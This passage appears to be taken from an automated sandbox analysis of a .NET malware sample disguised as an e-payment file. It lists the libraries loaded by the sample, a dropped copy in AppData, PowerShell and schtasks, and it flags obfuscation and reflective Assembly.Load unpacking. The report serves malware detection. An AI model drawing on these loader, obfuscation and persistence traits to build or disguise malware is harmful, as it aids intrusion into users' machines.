            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: msvcp60.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: msvcp60.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: e-Payment.NET.CMS4006975815.exe, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: JXHPwNYzysUjKo.exe.0.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs.Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.cs.Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.cs.Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040E4C4 LoadLibraryA,GetProcAddress,13_2_0040E4C4
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C3FAF push esp; ret 0_2_023C3FB9
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A52E0 pushad ; iretd 9_2_048A52E1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A5248 push esp; iretd 9_2_048A5249
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A5378 pushfd ; iretd 9_2_048A5379
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040FCF0 push eax; ret 13_2_0040FD1E
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: section name: .text entropy: 7.914356657903147
            Source: JXHPwNYzysUjKo.exe.0.drStatic PE information: section name: .text entropy: 7.914356657903147
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, eX7sUIKLXbLBJFUXJss.csHigh entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, FoCs0V4dUW7V9Ys8RL.csHigh entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, j6u7xiPYRpOJPHghlF.csHigh entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.csHigh entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, GIcmcBXmdsr9o6R5jH.csHigh entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, aJXx8DABJGbejPMByH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, LS7EsZky9IidIcyfRu.csHigh entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, vGIT7vmGkmTJonR3Jr.csHigh entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, bR6muntND966Zj1tHg.csHigh entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, al7GZ9yc9cs62qKrsm.csHigh entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, TM8wBMKwOiMiiMRkZ5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, n0YQspKKCBy6FdP62Xy.csHigh entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, n549rSinEmAngKcBlV.csHigh entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, uYj2wPN1bAqkIUsRaQ.csHigh entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
